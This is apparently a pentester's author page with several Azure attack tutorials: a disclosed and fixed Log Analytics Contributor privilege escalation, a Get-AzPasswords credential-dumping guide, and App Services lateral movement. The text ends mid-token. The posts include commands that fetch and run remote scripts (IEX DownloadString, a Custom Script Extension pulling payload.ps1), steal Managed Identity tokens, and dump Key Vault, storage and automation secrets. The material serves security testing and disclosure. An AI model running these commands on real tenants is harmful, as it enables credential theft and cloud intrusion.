Karl Fosaaen

Karl specializes in network and web application penetration testing. He holds a BS in Computer Science from the University of Minnesota and has over a decade of consulting experience in the computer security industry. In that time, he has worked with a variety of industries, including financial services, health care, and retail. Karl holds the Security+, CISSP, and GXPN certifications. In his spare time, he has volunteered at conferences including DEF CON, THOTCON, and AppSec USA, and has previously spoken at BSidesPDX, THOTCON, AppSec California, and DerbyCon.
More by Karl Fosaaen

Escalating Azure Privileges with the Log Analytics Contributor Role (published September 13, 2021)

TL;DR - This issue has already been fixed, but it was a fairly minor privilege escalation that allowed an Azure AD user to escalate from the Log Analytics Contributor role to a full Subscription Contributor role.

The Log Analytics Contributor Role is intended to be used for reading monitoring data and editing monitoring settings. These rights also include the ability to run extensions on Virtual Machines, read deployment templates, and access keys for Storage accounts.

Based on the role’s previous rights on the Automation Account service (Microsoft.Automation/automationAccounts/*), the role could have been used to escalate privileges to the Subscription Contributor role by modifying existing Automation Accounts that are configured with a Run As account. This issue was reported to Microsoft in 2020 and has since been remediated.

Escalating Azure Permissions

Automation Account Run As accounts are initially configured with Contributor rights on the subscription. Because of this, an attacker with access to the Log Analytics Contributor role could create a new runbook in an existing Automation Account and execute code from the runbook as a Contributor on the subscription.

These Contributor rights would have allowed the attacker to create new resources on the subscription and modify existing resources. This includes Key Vault resources, where the attacker could add their account to the access policies for the vault, granting themselves access to the keys and secrets stored in the vault.
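
As a rough sketch of that Key Vault pivot, a Contributor could grant their own account an access policy with the Az PowerShell module (the vault and user names below are placeholders, not values from this engagement):

# Hypothetical names - grant our own account read rights on a vault we have Contributor access to
Set-AzKeyVaultAccessPolicy -VaultName 'example-vault' -UserPrincipalName 'attacker@example.com' -PermissionsToSecrets get,list -PermissionsToKeys get,list -PermissionsToCertificates get,list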

Finally, by exporting the Run As certificate from the Automation Account, an attacker would be able to create a persistent Az (CLI or PowerShell module) login as a subscription Contributor (the Run As account).

Since this issue has already been remediated, we will show how we went about explaining the issue in our Microsoft Security Response Center (MSRC) submission.

Attack Walkthrough

Using an account with the Owner role applied to the subscription (kfosaaen), we created a new Automation Account (LAC-Contributor) with the “Create Azure Run As account” option set to “Yes”. We needed to be an Owner on the subscription to create this account, as Contributors do not have rights to add the Run As account.

[Screenshot: Add Automation Account]

Note that the Run As account (LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=) was added to the Azure tenant and is now listed in the subscription IAM tab as a Contributor.

[Screenshot: Access Control]

In the subscription IAM tab, we assigned the “Log Analytics Contributor” role to an Azure Active Directory user (LogAnalyticsContributor) with no other roles or permissions assigned to the user at the tenant level.

[Screenshot: Role added]

On a system with the Az PowerShell module installed, we opened a PowerShell console and logged in to the subscription with the Log Analytics Contributor user and the Connect-AzAccount function.

PS C:\temp> Connect-AzAccount
 
Account SubscriptionName TenantId Environment
------- ---------------- -------- -----------
LogAnalyticsContributor kfosaaen 6[REDACTED]2 AzureCloud

Next, we downloaded the MicroBurst tools and imported the module into the PowerShell session.

PS C:\temp> import-module C:\temp\MicroBurst\MicroBurst.psm1
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Using the Get-AzPasswords function in MicroBurst, we collected the Automation Account credentials. This function created a new runbook (iEhLnPSpuysHOZU) in the existing Automation Account that exported the Run As account certificate for the Automation Account.

PS C:\temp> Get-AzPasswords -Verbose 
VERBOSE: Logged In as LogAnalyticsContributor@[REDACTED]
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE: Getting the RunAs certificate for LAC-Contributor using the iEhLnPSpuysHOZU.ps1 Runbook
VERBOSE: Waiting for the automation job to complete
VERBOSE: Run AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE: Removing iEhLnPSpuysHOZU runbook from LAC-Contributor Automation Account
VERBOSE: Password Dumping Activities Have Completed

We then used the MicroBurst created script (AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1) to authenticate to the Az PowerShell module as the Run As account for the Automation Account. As we can see in the output below, the account we authenticated as (Client ID - d0c0fac3-13d0-4884-ad72-f7b5439c1271) is the “LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=” account and it has the Contributor role on the subscription.

PS C:\temp> .\AuthenticateAs-LAC-Contributor-AzureRunAsConnection.ps1
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint Subject
---------- -------
A0EA38508EEDB78A68B9B0319ED7A311605FF6BB DC=LAC-Contributor_test_7a[REDACTED]b5
Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud],
[AzureUSGovernment, AzureUSGovernment]}
Context : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp> Get-AzContext | select Account,Tenant
Account Subscription
------- ------
d0c0fac3-13d0-4884-ad72-f7b5439c1271 7a[REDACTED]b5
PS C:\temp> Get-AzRoleAssignment -ObjectId bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
RoleAssignmentId : /subscriptions/7a[REDACTED]b5/providers/Microsoft.Authorization/roleAssignments/0eb7b73b-39e0-44f5-89fa-d88efc5fe352
Scope : /subscriptions/7a[REDACTED]b5
DisplayName : LAC-Contributor_a62K0LQrxnYHr0zZu/JL3kFq0qTKCdv5VUEfXrPYCcM=
SignInName :
RoleDefinitionName : Contributor
RoleDefinitionId : b24988ac-6180-42a0-ab88-20f7382dd24c
ObjectId : bc9d5b08-b412-4fb1-a71e-a39036fd2b3b
ObjectType : ServicePrincipal
CanDelegate : False
Description :
ConditionVersion :
Condition :
[Screenshot: LAC Contributor]

MSRC Submission Timeline

Microsoft was great to work with on the submission and they were quick to respond to the issue. They have since removed the Automation Accounts permissions from the affected role and updated documentation to reflect the issue.

[Screenshot: Custom Azure Automation Contributor Role]

Here’s a general timeline of the MSRC reporting process:

  • NetSPI initially reports the issue to Microsoft – 10/15/20
  • MSRC Case 61630 created – 10/19/20
  • Follow up email sent to MSRC – 12/10/20
  • MSRC confirms the behavior is a vulnerability and should be fixed – 12/11/20
  • Multiple back and forth emails to determine disclosure timelines – March-July 2021
  • Microsoft updates the role documentation to address the issue – July 2021
  • NetSPI does initial public disclosure via DEF CON Cloud Village talk – August 2021
  • Microsoft removes Automation Account permissions from the LAC Role – August 2021

Postscript

While this blog doesn’t address how to escalate up from the Log Analytics Contributor role, there are many ways to pivot from the role. Here are some of its other permissions: 

                "actions": [
                    "*/read",
                    "Microsoft.ClassicCompute/virtualMachines/extensions/*",
                    "Microsoft.ClassicStorage/storageAccounts/listKeys/action",
                    "Microsoft.Compute/virtualMachines/extensions/*",
                    "Microsoft.HybridCompute/machines/extensions/write",
                    "Microsoft.Insights/alertRules/*",
                    "Microsoft.Insights/diagnosticSettings/*",
                    "Microsoft.OperationalInsights/*",
                    "Microsoft.OperationsManagement/*",
                    "Microsoft.Resources/deployments/*",
                    "Microsoft.Resources/subscriptions/resourcegroups/deployments/*",
                    "Microsoft.Storage/storageAccounts/listKeys/action",
                    "Microsoft.Support/*"
                ]

More specifically, this role can pivot to Virtual Machines via Custom Script Extensions and list out Storage Account keys. You may be able to make use of a Managed Identity on a VM, or find something interesting in the Storage Account.
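
As a rough sketch of those two pivots with the Az PowerShell module (all resource names below are placeholders):

# Hypothetical names - list the Storage Account keys that the role can read
Get-AzStorageAccountKey -ResourceGroupName 'example-rg' -Name 'examplestorage'

# Hypothetical names - push a Custom Script Extension to execute a script on a VM; from there, any attached Managed Identity token can be requested
Set-AzVMCustomScriptExtension -ResourceGroupName 'example-rg' -VMName 'example-vm' -Location 'eastus' -Name 'exampleExtension' -FileUri 'https://example.com/payload.ps1' -Run 'payload.ps1'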

Looking for an Azure pentesting partner? Consider NetSPI.

Azure Pentesting: Extracting All the Azure Passwords (webinar, published August 13, 2021)

Date: Wednesday, September 22
Time: 12:00 - 1:00 PM CT

Whether it's the migration of legacy systems or the creation of brand-new applications, many organizations are turning to Microsoft’s Azure cloud as their platform of choice. This brings new challenges for penetration testers who are less familiar with the platform, and now have more attack surfaces to exploit. In an attempt to automate some of the common Azure escalation tasks, the MicroBurst toolkit was created to contain tools for attacking different layers of an Azure tenant. In this talk, we will be focusing on the password extraction functionality included in MicroBurst. We will review many of the places that passwords can hide in Azure, and the ways to manually extract them. For convenience, we will also show how the Get-AzPasswords function can be used to automate the extraction of credentials from an Azure tenant. Finally, we will review a case study on how this tool was recently used to find a critical issue in the Azure permissions model that resulted in a fix from Microsoft.

A Beginners Guide to Gathering Azure Passwords (published October 22, 2020)

It has been a while since the initial release (August 2018) of the Get-AzurePasswords module within MicroBurst, so I figured it was time to do an overview post that explains how to use each option within the tool. Since each targeted service in the script has a different way of getting credentials, I want users of the tool to really understand how things are working.

For those that just want to jump to information on a specific service, each one is covered in its own section below: Key Vaults, App Services, Automation Accounts, Storage Account Keys, and Azure Container Registries.

Additionally, we've renamed the function to Get-AzPasswords to match the PowerShell modules that we're using in the function.

AzureRM Versus Az

As of March 19, 2020, we pushed some changes to MicroBurst to switch the cmdlets over to the Az PowerShell modules (from AzureRM). This was a much-needed switch, as the AzureRM modules are being replaced by the Az modules.

Along with these updates, I also wanted to make some additions to the Get-AzurePasswords functionality. Since we reorganized all of the code in MicroBurst to match up with the related supporting modules (Az, AzureAD, MSOL, etc.), we thought it was important to separate out function names based on the modules the script was using.

[Screenshot: Modules]

Get-AzurePasswords will still live in the AzureRM folder in MicroBurst, but it will not be updated with any new functionality. Going forward, I highly recommend that everyone switches over to the newly renamed version "Get-AzPasswords" in the Az folder in MicroBurst.

Important Script Usage Note - Some of these functions can make minor temporary changes to an Azure subscription (see Automation Accounts). If you Ctrl+C during the script execution, you may end up with unintended files or changes in your subscription.

I'll cover each of these concerns in the sections below, but have patience when running these functions. I know Azure can have its slow moments, so (in most cases) just give the script a moment to catch up and everything should be good. I haven't been keeping track, but I believe I've lost several months of time waiting for automation runbook jobs to complete.

Function Usage

For each service section, I've noted the script flag that you can use to toggle ("-Keys Y" versus "-Keys N") the collection of that specific service. Running the script with no flags will gather credentials from all services.

Step 1. Import the MicroBurst Module

PS C:\MicroBurst> Import-Module .\MicroBurst.psm1
Imported Az MicroBurst functions
Imported AzureAD MicroBurst functions
Imported MSOnline MicroBurst functions
Imported Misc MicroBurst functions
Imported Azure REST API MicroBurst functions

Step 2. Authenticate to the Azure Tenant

PS C:\MicroBurst> Login-AzAccount

Account           SubscriptionName  TenantId                             Environment
-------           ----------------  --------                             -----------
test@example.com  TestSubscription  4712345a-6543-b5s4-a2b2-e01234567895 AzureCloud

Step 3. Gather Passwords

PS C:\MicroBurst> Get-AzPasswords -Verbose
VERBOSE: Logged In as test@example.com
VERBOSE: Getting List of Key Vaults...
VERBOSE:  Exporting items from testingKeys
VERBOSE:   Getting Key value for the testKey Key
VERBOSE:   Getting Secret value for the TestKey Secret
VERBOSE: Getting List of Azure App Services...
VERBOSE:  Profile available for microburst-application
VERBOSE: Getting List of Azure Container Registries...
VERBOSE: Getting List of Storage Accounts...
VERBOSE:  Getting the Storage Account keys for the teststorage account
VERBOSE: Getting List of Azure Automation Accounts...
VERBOSE:  Getting the RunAs certificate for autoadmin using the XZvOYzsuBiGbfqe.ps1 Runbook
VERBOSE:   Waiting for the automation job to complete
VERBOSE:    Run AuthenticateAs-autoadmin-AzureRunAsConnection.ps1 (as a local admin) to import the cert and login as the Automation Connection account
VERBOSE:   Removing XZvOYzsuBiGbfqe runbook from autoadmin Automation Account
VERBOSE:  Getting cleartext credentials for the autoadmin Automation Account
VERBOSE:   Getting cleartext credentials for test using the dOFtWgEXIQLlRfv.ps1 Runbook
VERBOSE:    Waiting for the automation job to complete
VERBOSE:    Removing dOFtWgEXIQLlRfv runbook from autoadmin Automation Account
VERBOSE: Password Dumping Activities Have Completed

*Running this will prompt you (via Out-GridView) to select the subscription(s) to gather credentials from.

For easier output management, I'd recommend piping the output to either "Out-GridView" or "Export-CSV".

With that housekeeping out of the way, let's dive into the credentials that we're able to gather with Get-AzPasswords.

Key Vaults (-Keys Y)

Azure Key Vaults are Microsoft’s solution for storing sensitive data (Keys, Passwords/Secrets, Certs) in the Azure cloud. Inherently, Key Vaults are great sources for finding credential data. If you have a user with the correct rights, you should be able to read data out of the key stores.

Vault access is controlled by the Access Policies in each vault, but any users with Contributor rights are able to give themselves access to a Key Vault. Get-AzPasswords will not modify any Key Vault Access Policies, but you could give your account read permissions on the vault if you really needed to read a key.
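
If you do have (or grant yourself) vault access and just want to check a single value manually, a minimal sketch with the Az module looks like this (vault and secret names are placeholders; newer Az.KeyVault versions also offer an -AsPlainText switch on Get-AzKeyVaultSecret):

# Hypothetical names - pull one secret and convert the SecureString value to cleartext
$secret = Get-AzKeyVaultSecret -VaultName 'example-vault' -Name 'example-secret'
[System.Net.NetworkCredential]::new('', $secret.SecretValue).Password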

An example Key Vault Secret:

[Screenshot: Keyvault]

Get-AzPasswords will export all of the secrets in cleartext, along with any certificates. You also have the option to save the certificate files locally with the "-ExportCerts Y" flag.

Sample Output:

Type : Key
Name : DiskKey
Username : N/A
Value : {"kid":"https://notArealVault.vault.azure.net/keys/DiskKey/63abcdefghijklmnop39","kty ":"RSA","key_ops":["sign","verify","wrapKey","unwrapKey","encrypt","decrypt"],"n":"v[REDACTED]w","e":"AQAB"}
PublishURL : N/A
Created : 5/19/2020 5:20:12 PM
Updated : 5/19/2020 5:20:12 PM
Enabled : True
Content Type : N/A
Vault : notArealVault
Subscription : NotARealSubscription

Type : Secret
Name : TestKey
Username : N/A
Value : Karl'sPassword
PublishURL : N/A
Created : 3/7/2019 9:28:37 PM
Updated : 3/7/2019 9:28:37 PM
Enabled : True
Content Type : Password
Vault : notArealVault
Subscription : NotARealSubscription

Finally, access to the Key Vaults may be restricted by network, so you may need to run this from an Azure VM on the subscription, or from an IP in the approved "Private endpoint and selected networks" list. These settings can be found under the Networking tab in the Azure portal.

Alternatively, you may need to use an automation account "Run As" account to request the keys. Steps to complete that process are outlined here.

App Services (-AppServices Y)

Azure App Services are Microsoft’s option for rapid application deployment. Applications can be spun up quickly using app services and the configurations (passwords) are pushed to the applications via the App Services profiles.

In the portal, the App Services deployment passwords are typically found in the “Publish Profile” link that can be found in the top navigation bar within the App Services section. Any user with contributor rights to the application should be able to access this profile.

[Screenshot: Appservices]

These publish profiles will contain Web and FTP credentials that can be used to get access to the App Service's files. In addition to that, any stored connection strings should also be available in the file. All of the available profile credentials are parsed by Get-AzPasswords, so it's easy to gather credentials for multiple App Services applications at once.

Sample Output:

Type         : AppServiceConfig
Name         : appServicesApplication - Web Deploy
Username     : $appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : appServicesApplication.scm.azurewebsites.net:443
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type         : AppServiceConfig
Name         : appServicesApplication - FTP
Username     : appServicesApplication$appServicesApplication
Value        : dS[REDACTED]jM
PublishURL   : ftp://appServicesApplication.ftp.azurewebsites.windows.net/site/wwwroot
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Password
Vault        : N/A
Subscription : NotARealSubscription

Type : AppServiceConfig
Name : appServicesApplication-Custom-ConnectionString
Username : N/A
Value : metadata=res://*/Models.appServicesApplication.csdl|res://*/Models.appServicesApplication.ssdl|res://*/Models.appServicesApplication.msl;provider=System.Data.SqlClient;provider connection string="Data Source=abcde.database.windows.net;Initial Catalog=app_Enterprise_Prod;Persist Security Info=True;User ID=psqladmin;Password=somepassword9" 
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : ConnectionString
Vault : N/A
Subscription : NotARealSubscription
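
If you want to pull a single publish profile yourself with the Az module, outside of Get-AzPasswords, something along these lines should work (resource names are placeholders):

# Hypothetical names - download the publish profile XML, which contains the Web Deploy and FTP credentials
Get-AzWebAppPublishingProfile -ResourceGroupName 'example-rg' -Name 'example-app' -OutputFile .\example-app.publishsettings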

Potential next steps for App Services have been outlined in another NetSPI blog post here.

Automation Accounts (-AutomationAccounts Y)

Automation Accounts are one of the ways that you can automate jobs and routine tasks within Azure. These tasks (Runbooks) are frequently run with stored credentials, or with the service account (Run As "Connections") tied to the Automation Account.

[Screenshot: Automation]

Both of these credential types can be returned with Get-AzPasswords and can potentially allow for privilege escalation. In order to gather these credentials from the Automation Accounts, we need to create new runbooks that will cast the credentials out to variables that are then printed to the runbook job output.
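
The core of one of these runbooks is small. A minimal sketch, assuming a stored credential asset with a placeholder name (Get-AzPasswords layers the encryption described below on top of this output):

# Minimal runbook sketch - pull a stored credential asset and write it to the job output
$cred = Get-AutomationPSCredential -Name 'ExampleStoredCredential'
Write-Output ("{0} : {1}" -f $cred.UserName, $cred.GetNetworkCredential().Password)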

To protect these credentials in the output, we've implemented an encryption scheme in Get-AzPasswords that encrypts the job output.

[Screenshot: Enccreds]

The Run As certificates (covered in another blog) can then be used to authenticate (run the AuthenticateAs PS1 script) from your testing system as the stored Run As connection.

[Screenshot: Authas]

Any stored credentials may have a variety of uses, but I've frequently seen domain accounts being stored here, so that can lead to some interesting lateral movement options.

Sample Output:

Type : Azure Automation Account
Name : kfosaaen
Username : test
Value : testPassword
PublishURL : N/A
Created : N/A
Updated : N/A
Enabled : N/A
Content Type : Password
Vault : N/A
Subscription : NotARealSubscription

As a secondary note here, you can also request bearer tokens for the Run As automation accounts from a custom runbook. I cover the process in this blog post, but I think it's worth noting here, since it's not included in Get-AzPasswords, but it is an additional way to get a credential from an Automation Account.

And one final note on gathering credentials from Automation Accounts. It was noted above, but sometimes Azure Automation Accounts can be slow to respond. If you're having issues getting a runbook to run and cancel the function execution before it completes, you will need to manually go in and clean up the runbooks that were created as part of the function execution.

[Screenshot: Runbook]

These will always be named with a 15-character random string of letters (e.g., lwVSNvWYpPXCcDd). You will also have local files in your execution directory to clean up, and they will have the same names as the ones that were uploaded for execution.

Storage Account Keys (-StorageAccounts Y)

Storage Accounts are the multipurpose (Public/Private files, tables, queues) service for storing data in an Azure subscription. This section is pretty simple compared to the previous ones, but gathering the account keys is an easy way to maintain persistence in a sensitive data store. These keys can be used with the Azure Storage Explorer application to remotely mount storage accounts.

[Screenshot: Storage]

These access keys can easily be cycled, but if you're looking for persistence in a Storage Account, these would be your best bet. Additionally, if you're modifying Cloud Shell files for escalation/persistence, I'd recommend holding on to a copy of these keys for any Cloud Shell storage accounts.

Sample Output:

Type         : Storage Account
Name         : notArealStorageAccount
Username     : key1
Value        : W84[REDACTED]==
PublishURL   : N/A
Created      : N/A
Updated      : N/A
Enabled      : N/A
Content Type : Key
Vault        : N/A
Subscription : NotARealSubscription
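
If you just want to grab the keys for a single account manually, the Az module equivalent is roughly the following (resource names are placeholders):

# Hypothetical names - list the account keys and use one to build a storage context
$keys = Get-AzStorageAccountKey -ResourceGroupName 'example-rg' -Name 'examplestorage'
$ctx = New-AzStorageContext -StorageAccountName 'examplestorage' -StorageAccountKey $keys[0].Value
Get-AzStorageContainer -Context $ctx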

Azure Container Registries (-ACR Y)

Azure Container Registries are used in Azure to manage Docker images for use within Azure Kubernetes Service (AKS) or as container instances (either in Azure or elsewhere). More often than not, we will find keys and credentials stored in these container images.

In order to authenticate to the repositories, you can either use the AZ CLI with AzureAD credentials, or there can be an "Admin user" enabled for the registry. If you have AzureAD user rights to pull the admin password for a container registry, you should already have rights to authenticate to the repositories with the AZ CLI. However, if an Admin user is enabled for the registry, that user could then be used for persistence after you lose access to the initial AzureAD user.

[Screenshot: Container]

Fun Fact - Any AzureAD user with "Reader" permissions on the Container Registry is able to connect to the repositories and pull images down with Docker.
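
If the Admin user is enabled, pulling its credentials with the Az module looks roughly like this (registry names are placeholders, and this assumes the Az.ContainerRegistry module is available):

# Hypothetical names - read the registry admin credentials, then reuse them with docker
$acrCreds = Get-AzContainerRegistryCredential -ResourceGroupName 'example-rg' -Name 'exampleregistry'
# docker login exampleregistry.azurecr.io -u $($acrCreds.Username) -p $($acrCreds.Password)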

For more information on using these credentials, here's another NetSPI blog.

Conclusion

There was a lot of ground to cover here, but hopefully this does a good job of explaining all of the functionality available in Get-AzPasswords. It's worth noting that most of this functionality relies on your AzureAD user having Contributor IAM rights on the applicable service. While some may argue that Contributor access is equivalent to admin in a subscription, I would argue that most subscriptions primarily consist of Contributor users.

If there are any sources for Azure passwords that you would like to see added to Get-AzPasswords, feel free to make a pull request on the MicroBurst GitHub repository.

Lateral Movement in Azure App Services (published August 17, 2020)

We test a lot of web applications at NetSPI, and as everyone continues to move their operations into the cloud, we're running into more instances of applications being run on Azure App Services.


Whenever we run into an App Services application with a serious vulnerability, I'll frequently get a ping asking about next steps to take in an Azure environment. This blog will hopefully answer some of those questions.

Initial Access

We will be primarily talking about command execution on an App Services host. There are plenty of other vulnerabilities (SQLi, SSRF, etc.) that we could put into the context of Azure App Services, but we'll save those for another blog.

For our command injection examples, we'll assume that you've used one of the following methods to execute commands on a system:

  • An uploaded web shell
  • Unintended CMD injection via an application issue
  • Intended CMD Injection through application functionality

Alternatively, keep in mind that Azure Portal Access (with an account with Contributor rights on an app) also allows you to run commands from the App Services Console. This will be important if there's a higher privileged Managed Identity in use by the app, and we want to use this to escalate Azure permissions.

[Screenshot: Cmdsql]

For the sake of simplicity, we'll also assume that this is a relatively clean command injection (See Web Shell), where you can easily see the results of your commands. If we want to get really complicated, we could talk about using side channels to exfiltrate command results, but that's also for another blog.

Azure "App Services"

To further complicate matters, Azure App Services encompasses "Function Apps" and "App Service Apps". There are some key differences between the two, but for the purposes of this blog, we'll consider them to be the same. Additionally, there are Linux and Windows options for both, so we'll try to cover options for those as well.

If you want to follow along with your own existing App Services app, you can use the Console (or SSH) section in the Development Tools section of the Azure Portal for your App Services app.

[Screenshot: Appservices]

Choose Your Own Adventure

With command execution on the App Services host, there are several paths that you can take, each covered in a section below: looking locally at the application files, looking at the environment variables, accessing Storage Accounts, accessing Azure SQL Databases, and abusing Managed Identities to get tokens.

Looking Locally

First things first, this is an application server, so you might want to look at the application files.

  • The application source code files can (typically) be found at the %DEPLOYMENT_SOURCE%
  • The actual working files for the application can (typically) be found at %DEPLOYMENT_TARGET%
  • Or /home/site/wwwroot if you're working with a Linux system
[Screenshot: Locally]

If you're operating on a bare bones shell at this point, I would recommend pulling down an appropriate web shell to your %DEPLOYMENT_TARGET% (or /home/site/wwwroot) directory. This will allow you to upgrade your shell and allow you to better explore the host.

Just remember, this app server is likely facing the internet and a web shell without a password easily becomes someone else's web shell.

Within the source code files, you can also look for common application configuration files (web.config, etc.) that might contain additional secrets that you could use to pivot through to other services (as we'll see later in the blog).
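
A quick way to hunt for those secrets from a PowerShell shell on the host (the paths and patterns below are just examples):

# Search the deployed application files for likely credential material (hypothetical patterns)
Get-ChildItem -Path $env:DEPLOYMENT_TARGET -Recurse -Include *.config,*.json,*.xml |
    Select-String -Pattern 'connectionstring','password','accountkey' -SimpleMatch |
    Select-Object Path, LineNumber, Line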

Looking at the Environment

On an App Services host, most of your configuration variables will be available as environmental variables on the host. These variables will most likely contain keys that we can use to pivot to other Azure services in the subscription.

Since you're most likely to have a cmd.exe shell, you can just use the "set" command to list out all of the environmental variables. It will look like this (without the redactions):

[Screenshot: Env Win]

If you're using PowerShell for your command execution, you can use the "dir env: | ft -Wrap " command to do the same. Make sure that you're piping to "ft -wrap" as that will allow the full text values to be returned without being truncated.

Alternatively, if you're in a Linux shell, you can use the "printenv" command to accomplish the same:

[Screenshot: Env Linux]

Now that we (hopefully) have some connection strings for Azure services, we can start getting into other services.

Accessing Storage Accounts

If you're able to find an Azure Storage Account connection string, you should be able to remotely mount that storage account with the Azure Storage Explorer.

Here are a couple of common Windows environmental variables that hold those connection strings:

  • APPSETTING_AzureWebJobsStorage
  • APPSETTING_WEBSITE_CONTENTAZUREFILECONNECTIONSTRING
  • AzureWebJobsStorage
  • WEBSITE_CONTENTAZUREFILECONNECTIONSTRING

Additionally, you may find these strings in the application configuration files. Keep an eye out for any config files containing "core.windows.net", storage, blob, or file in them.

Using the Azure Storage Explorer, copy the Storage Account connection string and use that to add a new Storage Account.

[Screenshot: Storage]

Now that you have access to the Storage Account, you should be able to see any files that the application has rights to.

[Screenshot: Storage]


Accessing Azure SQL Databases

Similar to the Storage Accounts, you may find connection strings for Azure SQL in the configuration files or environmental variables. Most Azure SQL servers that I encounter have access locked down to specific IP ranges, so you may not be able to remotely access the servers from the internet. Every once in a while, we'll find a server with 0.0.0.0-255.255.255.255 in their allowed list, but that's pretty rare.

[Screenshot: Azuresql]

Since direct SQL access from the internet is unlikely, we will need an alternative that works from within the App Services host.

Azure SQL from Windows:

For Windows, we can plug in the values from our connection string and make use of PowerUpSQL to access Azure SQL databases.

Confirm Access to the "sql-test" Database on the "netspi-test" Azure SQL server:

D:\home\site\wwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLConnectionTest -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 | ft -wrap"


ComputerName                     Instance                         Status    
------------                     --------                         ------    
netspi-test.database.windows.net netspi-test.database.windows.net Accessible

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

D:\home\site\wwwroot>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1'); Get-SQLQuery -Instance 'netspi-test.database.windows.net' -Database sql-test -Username MyUser -Password 123Password456 -Query 'select @@version' | ft -wrap"


Column1                                                                        
-------                                                                        
Microsoft SQL Azure (RTM) - 12.0.2000.8                                        
    Jul 31 2020 08:26:29                                                          
    Copyright (C) 2019 Microsoft Corporation

From here, you can modify the query to search the database for more information.

For more ideas on pivoting via Azure SQL, check out the PowerUpSQL GitHub repository and Scott Sutherland's NetSPI blog author page.

Azure SQL from Linux:

For Linux hosts, you will need to check the stack that you're running (Node, Python, PHP, .NET Core, Ruby, or Java). In your shell, run "printenv | grep -i version" and look for things like RUBY_VERSION or PYTHON_VERSION.

For simplicity, we will assume that we are set up with the Python Stack and pyodbc is already installed as a module. For this, we will use a pretty basic Python script to query the database.

Other stacks will (most likely) require some different scripting or clients that are more compatible with the provided stack, but we'll save that for another blog.

Execute a query on the "sql-test" Database on the "netspi-test" Azure SQL server:

root@567327e35d3c:/home# cat sqlQuery.py
import pyodbc
server = 'netspi-test.database.windows.net'
database = 'sql-test'
username = 'MyUser'
password = '123Password456'
driver= '{ODBC Driver 17 for SQL Server}'

with pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=1433;DATABASE='+database+';UID='+username+';PWD='+ password) as conn:
        with conn.cursor() as cursor:
                cursor.execute("SELECT @@version")
                row = cursor.fetchone()
                while row:
                        print (str(row[0]))
                        row = cursor.fetchone()

root@567327e35d3c:/home# python sqlQuery.py
Microsoft SQL Azure (RTM) - 12.0.2000.8
        Jul 31 2020 08:26:29
        Copyright (C) 2019 Microsoft Corporation

Your best bet for deploying this script to the host is probably downloading it from a remote source. Trying to manually edit Python from the Azure web based SSH connection is not going to be a fun time.

More generally, trying to do much of anything in these Linux hosts may be tricky. For this blog, I was working in a sample app that I spun up for myself and immediately ran into multiple issues, so your mileage may vary here.

For more information about using Python with Azure SQL, check out Microsoft's documentation.

Abusing Managed Identities to Get Tokens

An application/VM/etc. can be configured with a Managed Identity that is given rights to specific resources in the subscription via IAM policies. This is a handy way of granting access to resources, but it can be used for lateral movement and privilege escalation.

We've previously covered Managed Identities for VMs on the Azure Privilege Escalation Using Managed Identities blog post. If the application is configured with a Managed Identity, you may be able to use the privileges of that identity to pivot to other resources in the subscription and potentially escalate privileges in the subscription/tenant.

In the next section, we'll cover getting tokens for a Managed Identity that can be used with the management.azure.com REST APIs to determine the resources that your identity has access to.

Getting Tokens

There are two different ways to get tokens out of your App Services application. Each of these depend on different versions of the REST API, so depending on the environmental variables that you have at your disposal, you may need to choose one or the other.

*Note that if you're following along in the Console, the Windows commands will require writing that token to a file first, as Curl doesn't play nice with the Console output.

Windows:

  • MSI Secret Option:
curl "%MSI_ENDPOINT%?resource=https://management.azure.com&api-version=2017-09-01" -H secret:%MSI_SECRET% -o token.txt
type token.txt
  • X-IDENTITY-HEADER Option:
curl "%IDENTITY_ENDPOINT%?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:%IDENTITY_HEADER% -o token.txt
type token.txt

Linux:

  • MSI Secret Option:
curl "$MSI_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$MSI_SECRET
  • X-IDENTITY-HEADER Option:
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER

For additional reference material on this process, check out the Microsoft documentation.

These tokens can now be used with the REST APIs to gather more information about the subscription. We could do an entire post covering all of the different ways you can gather data with these tokens, but here are a few key areas to focus on.
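
For example, a management.azure.com scoped token can be used directly against the ARM REST API to see which subscriptions the identity can read. A minimal sketch, assuming $armToken holds the access_token value returned by the calls above:

# Minimal sketch - list the subscriptions visible to the Managed Identity
Invoke-RestMethod -Uri "https://management.azure.com/subscriptions?api-version=2020-01-01" -Headers @{ Authorization = "Bearer $armToken" }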

Accessing Key Vaults with Tokens

Using a Managed Identity token, you may be able to pivot over to any Key Vaults that the identity has access to. In order to retrieve these Key Vault values, we will need a token that's scoped to vault.azure.net. To get this vault token, use the previous process, and change the "resource" URL to https://vault.azure.net.

I would recommend setting two tokens as variables in PowerShell on your own system (outside of App Services):

$mgmtToken = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSU…"
